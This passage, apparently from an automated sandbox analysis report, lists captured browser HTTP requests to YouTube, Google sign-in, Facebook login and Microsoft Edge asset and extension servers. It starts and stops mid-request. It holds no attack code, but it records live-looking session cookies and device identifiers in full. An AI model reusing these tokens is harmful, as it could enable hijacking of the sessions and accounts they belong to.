CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=4270472996&ei=-uFNQh5txcmJSA7RUUvW6ti&ip=0.16.65.16&id=o-AFNUgc8ie4UDxg5BX6NylC1tYWE2UNTg0UhYW3BQWlr4o&itag=18&source=youtube&requiressl=yes&mh=X6&mm=458%2C23244%2C40999&mn=tIXQK%2CPFcB0%2CHv9lm&ms=tIXQK%2CPFcB0%2CHv9lm&mv=t&mvi=1&pl=26&initcwndbps=6086012&siu=1&spc=YMyTvzafjmQEXNneymJ8VxaRI9K39WIY_jBqFPfolJ0A&vprv=1&svpuc=1&mime=video%2Fmp4&ns=AdU1asG7fzzfAPcTr4VrvGXP&cnr=26&ratebypass=yes&dur=68643808&lmt=8594843229343748&mt=4270472996&fvip=3&c=WEB&txp=6086012&n=gjtr8jSjFest6pec&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A HTTP/1.1Host: rr1---sn-q4fl6nlz.googlevideo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?sv=2017-07-29&sr=c&sig=ODCnll3A%2Fpr7IBDaNsDR2zA%2FOssZl6xdmLkM6vzzbZ0%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-03-31T00%3A00%3A00Z&sp=r&assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sb=CmSoZXuzKcF1rAq_PIc_YoJb; fr=0BIGGuZwPUjIULfOD..BlqGQK.-A.AAA.0.0.BlqGQM.AWXfYTWBBsg; datr=DGSoZXKoCY8OkV9WMe-nT3iH; wd=1280x907
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=4270472996&ei=-uFNQh5txcmJSA7RUUvW6ti&ip=0.16.65.16&id=o-AFNUgc8ie4UDxg5BX6NylC1tYWE2UNTg0UhYW3BQWlr4o&itag=18&source=youtube&requiressl=yes&mh=X6&mm=458%2C23244%2C40999&mn=tIXQK%2CPFcB0%2CHv9lm&ms=tIXQK%2CPFcB0%2CHv9lm&mv=t&mvi=1&pl=26&ctier=L&initcwndbps=6086012&siu=1&spc=YMyTvzafjmQEXNneymJ8VxaRI9K39WIY_jBqFPfolJ0A&vprv=1&svpuc=1&mime=video%2Fmp4&ns=AdU1asG7fzzfAPcTr4VrvGXP&cnr=26&ratebypass=yes&dur=68643808&lmt=8594843229343748&mt=4270472996&fvip=3&c=WEB&txp=6086012&n=gjtr8jSjFest6pec&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A HTTP/1.1Host: rr1---sn-q4fl6nlz.googlevideo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=4270472996&ei=-uFNQh5txcmJSA7RUUvW6ti&ip=0.16.65.16&id=o-AFNUgc8ie4UDxg5BX6NylC1tYWE2UNTg0UhYW3BQWlr4o&itag=18&source=youtube&requiressl=yes&mh=X6&mm=458%2C23244%2C40999&mn=tIXQK%2CPFcB0%2CHv9lm&ms=tIXQK%2CPFcB0%2CHv9lm&mv=t&mvi=1&pl=26&initcwndbps=6086012&siu=1&spc=YMyTvzafjmQEXNneymJ8VxaRI9K39WIY_jBqFPfolJ0A&vprv=1&svpuc=1&mime=video%2Fmp4&ns=AdU1asG7fzzfAPcTr4VrvGXP&cnr=26&ratebypass=yes&dur=68643808&lmt=8594843229343748&mt=4270472996&fvip=3&c=WEB&txp=6086012&n=gjtr8jSjFest6pec&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A HTTP/1.1Host: rr1---sn-q4fl6nlz.googlevideo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /sw.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://www.youtube.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D; PREF=tz=Europe.Zurich
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /generate_204?z3RaYA HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:W4G8WO2z0KkgbaY-VUevTDJ_XgRMGg:MRkHWpORprI5e3z0; OTZ=7387175_52_52_123900_48_436380
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/008b3ca9-659d-4158-b079-5522d9c1cce3?P1=1706139284&P2=404&P3=2&P4=L9pk8EjofXaPGGnfSlCw4YkOcwppTAbvLD4MZY3uxdhSTCTiM3JnC0Ti45oPy2sQFGYtNvZmcgGEBwqV%2bv2Y1g%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: t5Edr8yuXvLvvqqNzWbDp/Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp2Fh1LVullqknwvfi41Bgz_cGuworpX9-qvX0psxzTFaAjKxJSIbTCzEnPsYVkspxjdHHyF&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S922877882%3A1705534476005670&theme=glif HTTP/1.1Host: accounts.google.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:W4G8WO2z0KkgbaY-VUevTDJ_XgRMGg:MRkHWpORprI5e3z0; OTZ=7387175_52_52_123900_48_436380
Source: global traffic	HTTP traffic detected: GET /login HTTP/1.1Host: www.facebook.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.facebook.com/loginAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sb=CmSoZXuzKcF1rAq_PIc_YoJb; fr=0BIGGuZwPUjIULfOD..BlqGQK.-A.AAA.0.0.BlqGQM.AWXfYTWBBsg; datr=DGSoZXKoCY8OkV9WMe-nT3iH; wd=1280x907
Source: global traffic	HTTP traffic detected: GET /_/bscframe HTTP/1.1Host: accounts.google.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/_/bscframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:W4G8WO2z0KkgbaY-VUevTDJ_XgRMGg:MRkHWpORprI5e3z0; OTZ=7387175_52_52_123900_48_436380
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&ifkv=ASKXGp1c0w5JaOfQYOlZuhQy86GoReFUxlHNL6-vwhawIMLsBG8McXpezbH0g-jF4-w_0KUlWLbG&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1259196525%3A1705534498192643&theme=glif HTTP/1.1Host: accounts.google.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&ifkv=ASKXGp1c0w5JaOfQYOlZuhQy86GoReFUxlHNL6-vwhawIMLsBG8McXpezbH0g-jF4-w_0KUlWLbG&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1259196525%3A1705534498192643&theme=glifAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&ifkv=ASKXGp2gStXVrlBaQMjEgnAGuNCSSHQe1IaseXO0u3ysS0pvSXZ4fQfiD0S-4xguuLCPZm_FnOKq&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-787607905%3A1705534499113821&theme=glif HTTP/1.1Host: accounts.google.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: 